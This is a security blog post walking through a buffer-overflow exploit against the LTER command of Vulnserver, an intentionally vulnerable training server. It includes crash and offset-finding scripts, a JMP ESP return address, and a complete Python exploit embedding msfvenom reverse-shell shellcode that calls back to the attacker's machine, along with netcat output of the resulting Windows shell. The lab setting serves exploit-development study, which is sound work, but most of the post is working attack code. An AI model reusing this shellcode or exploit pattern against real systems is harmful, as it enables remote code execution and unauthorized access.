Vulnserver LTER EIP Overwrite – A Little Easier This Time

While a simpler exploit, I wanted to share my LTER EIP overwrite as well.

Vulnserver LTER EIP Overwrite - Introduction

First, if you haven't read my SEH overwrite post, then I recommend you start there. I actually discovered this vulnerability during that process, so I will skip a few of the beginning steps.

Additionally, I won't really cover the character restrictions in this post, so you should read part 2 as well.

Crashing the Service

First, I grabbed my template from the earlier LTER exploit.

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.5.96"
port = 9999

length = 3000

padding = "A" * length

buffer = padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

print s.recv(1024)

print "[+] Sending exploit..."

s.send("LTER /.:/" + buffer)

print s.recv(1024)

s.close()

As you can see, 3000 bytes gives me full control over EIP (as well as EBP).

Vulnserver LTER EIP - EIP Overwrite

Calculating the Offset

With the overwrite verified, it was time to calculate the offset to EIP.

First, I generated a pattern of 3000 bytes.

root@kali:~/vulnserver/lter/eip# msf-pattern_create -l 3000

When I sent this to the server, EIP was overwritten with 0x386f4337.

Vulnserver LTER EIP - EIP Pattern

Putting this into pattern_offset gave me an offset of 2003 bytes.

root@kali:~/vulnserver/lter/eip# msf-pattern_offset -l 3000 -q 386f4337
[*] Exact match at offset 2003

Vulnserver LTER EIP - Verifying Control

Once I calculated my offset, I updated my exploit harness to check the value.

offset = 2003
length = 3000

padding = "A" * offset
overwrite = "BBBB"
extra = "C" * (length - (len(padding) + len(overwrite)))

When I sent this updated payload, EIP was overwritten with my "B"s as expected!

Vulnserver LTER EIP - EIP Control

Additionally, ESP was pointing directly to my extra "C" bytes, indicating that this was a straightforward EIP overwrite to JMP ESP.

Vulnserver LTER EIP - ESP

Vulnserver LTER EIP - JMP ESP

With control of EIP verified, it was time to use mona to find a jump to ESP.

Vulnserver LTER EIP - Mona JMP

When I resent my updated payload, I hit the breakpoint that I set on my selected (ascii) JMP ESP.

Vulnserver LTER EIP - Breakpoint

Shells, Shells, Shells

Since I already knew I had working reverse shell code from my earlier exploit, I just decided to reuse that.

Next, I resent my completed exploit to the listening server.

root@kali:~/vulnserver/lter/eip# python lter_eip_reverse.py
Welcome to Vulnerable Server! Enter HELP for help.

[+] Sending exploit...

On the server-side of things, there was no unhandled exceptions, which was a good sign.

Vulnserver LTER EIP - No Crash

Back on my attacking box, I was able to catch the reverse shell and get my command execution!

root@kali:~/vulnserver/lter/eip# nc -lvvp 4444
listening on [any] 4444 ...
192.168.5.96: inverse host lookup failed: Unknown host
connect to [192.168.5.97] from (UNKNOWN) [192.168.5.96] 49264
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Documents\vulnserver>whoami
whoami
ie8win7\ieuser

Vulnserver LTER EIP - Reverse Shell

The Code

Here is the final exploit that I used for my reverse shell.

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.5.96"
port = 9999

offset = 2003
length = 3000

buffer = "A" * offset
# 0x62501205 = JMP ESP
buffer += "\x05\x12\x50\x62"

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.5.97 LPORT=4444 -f py -e x86/alpha_mixed BufferRegister=ESP
buf =  ""
buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x68\x68\x6c\x42\x43\x30\x37\x70\x57\x70\x61"
buf += "\x70\x6c\x49\x6d\x35\x34\x71\x6f\x30\x42\x44\x4c\x4b"
buf += "\x70\x50\x44\x70\x6c\x4b\x70\x52\x36\x6c\x6c\x4b\x70"
buf += "\x52\x65\x44\x6e\x6b\x43\x42\x77\x58\x36\x6f\x4c\x77"
buf += "\x43\x7a\x65\x76\x74\x71\x59\x6f\x6c\x6c\x75\x6c\x53"
buf += "\x51\x43\x4c\x75\x52\x56\x4c\x35\x70\x4a\x61\x5a\x6f"
buf += "\x64\x4d\x43\x31\x7a\x67\x48\x62\x6c\x32\x62\x72\x62"
buf += "\x77\x4e\x6b\x42\x72\x46\x70\x6e\x6b\x53\x7a\x57\x4c"
buf += "\x6e\x6b\x70\x4c\x44\x51\x43\x48\x48\x63\x57\x38\x53"
buf += "\x31\x48\x51\x53\x61\x4c\x4b\x62\x79\x37\x50\x37\x71"
buf += "\x78\x53\x6e\x6b\x61\x59\x42\x38\x6b\x53\x67\x4a\x42"
buf += "\x69\x4e\x6b\x37\x44\x4c\x4b\x75\x51\x4b\x66\x65\x61"
buf += "\x39\x6f\x6c\x6c\x69\x51\x7a\x6f\x46\x6d\x76\x61\x78"
buf += "\x47\x56\x58\x39\x70\x64\x35\x39\x66\x67\x73\x63\x4d"
buf += "\x68\x78\x45\x6b\x31\x6d\x66\x44\x62\x55\x4b\x54\x62"
buf += "\x78\x6c\x4b\x50\x58\x56\x44\x33\x31\x58\x53\x42\x46"
buf += "\x4c\x4b\x54\x4c\x32\x6b\x4c\x4b\x46\x38\x57\x6c\x56"
buf += "\x61\x6a\x73\x4c\x4b\x64\x44\x4c\x4b\x65\x51\x48\x50"
buf += "\x6d\x59\x31\x54\x64\x64\x76\x44\x71\x4b\x33\x6b\x45"
buf += "\x31\x66\x39\x73\x6a\x73\x61\x6b\x4f\x79\x70\x71\x4f"
buf += "\x43\x6f\x31\x4a\x4c\x4b\x45\x42\x6a\x4b\x4c\x4d\x31"
buf += "\x4d\x73\x58\x67\x43\x76\x52\x47\x70\x55\x50\x73\x58"
buf += "\x53\x47\x43\x43\x65\x62\x73\x6f\x36\x34\x55\x38\x52"
buf += "\x6c\x30\x77\x56\x46\x44\x47\x49\x6f\x6e\x35\x78\x38"
buf += "\x4e\x70\x66\x61\x55\x50\x35\x50\x65\x79\x6f\x34\x66"
buf += "\x34\x46\x30\x55\x38\x34\x69\x6d\x50\x50\x6b\x35\x50"
buf += "\x79\x6f\x4a\x75\x30\x50\x52\x70\x62\x70\x66\x30\x61"
buf += "\x50\x36\x30\x31\x50\x62\x70\x33\x58\x4a\x4a\x46\x6f"
buf += "\x4b\x6f\x79\x70\x69\x6f\x4a\x75\x4a\x37\x32\x4a\x34"
buf += "\x45\x30\x68\x49\x50\x4f\x58\x57\x75\x51\x71\x65\x38"
buf += "\x37\x72\x63\x30\x77\x61\x53\x6c\x4c\x49\x4a\x46\x31"
buf += "\x7a\x44\x50\x53\x66\x36\x37\x50\x68\x6e\x79\x59\x35"
buf += "\x64\x34\x63\x51\x4b\x4f\x4b\x65\x4c\x45\x6f\x30\x50"
buf += "\x74\x76\x6c\x69\x6f\x42\x6e\x66\x68\x63\x45\x38\x6c"
buf += "\x55\x38\x6c\x30\x38\x35\x4d\x72\x30\x56\x69\x6f\x38"
buf += "\x55\x61\x78\x62\x43\x32\x4d\x45\x34\x67\x70\x6b\x39"
buf += "\x6b\x53\x56\x37\x33\x67\x36\x37\x50\x31\x5a\x56\x30"
buf += "\x6a\x64\x52\x61\x49\x73\x66\x5a\x42\x4b\x4d\x55\x36"
buf += "\x58\x47\x37\x34\x77\x54\x45\x6c\x56\x61\x77\x71\x4c"
buf += "\x4d\x61\x54\x31\x34\x32\x30\x6a\x66\x67\x70\x51\x54"
buf += "\x61\x44\x76\x30\x56\x36\x33\x66\x62\x76\x52\x66\x53"
buf += "\x66\x30\x4e\x53\x66\x62\x76\x62\x73\x71\x46\x70\x68"
buf += "\x32\x59\x5a\x6c\x57\x4f\x4c\x46\x4b\x4f\x59\x45\x4d"
buf += "\x59\x39\x70\x42\x6e\x51\x46\x72\x66\x79\x6f\x70\x30"
buf += "\x52\x48\x57\x78\x6e\x67\x45\x4d\x35\x30\x69\x6f\x39"
buf += "\x45\x6f\x4b\x6c\x30\x68\x35\x6d\x72\x76\x36\x71\x78"
buf += "\x4f\x56\x7a\x35\x4f\x4d\x4f\x6d\x79\x6f\x4a\x75\x55"
buf += "\x6c\x66\x66\x31\x6c\x45\x5a\x6b\x30\x6b\x4b\x79\x70"
buf += "\x73\x45\x33\x35\x6f\x4b\x32\x67\x75\x43\x34\x32\x30"
buf += "\x6f\x50\x6a\x65\x50\x71\x43\x39\x6f\x6e\x35\x41\x41"

buffer += buf

buffer += "B" * (length - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

print s.recv(1024)

print "[+] Sending exploit..."

s.send("LTER /.:/" + buffer)

print s.recv(1024)

s.close()

Vulnserver LTER EIP Overwrite - Conclusion

This was definitely easier to my earlier LTER exploit, but I wanted to finish it up for completeness' sake. Again, you can find the SEH exploit write-ups below.

I may only continue with one exploit per command, unless there is something particularly interesting about it.

If you have any suggestions for a command or exploit hat I should work on next, then definitely let me know!

Finally, you can find the exploit in my GitHub repository, but let me know if you think there is anything that I should add.

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

2 Comments

Filed under Security Not Included

2 Responses to Vulnserver LTER EIP Overwrite – A Little Easier This Time

  1. Vida

    Hey there just wanted to give you a quick heads up.
    The text in your article seem to be running off the screen in Internet explorer.

    I’m not sure if this is a format issue or something to do with web browser compatibility but I
    figured I’d post to let you know. The design and style look great though!
    Hope you get the problem fixed soon. Cheers

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.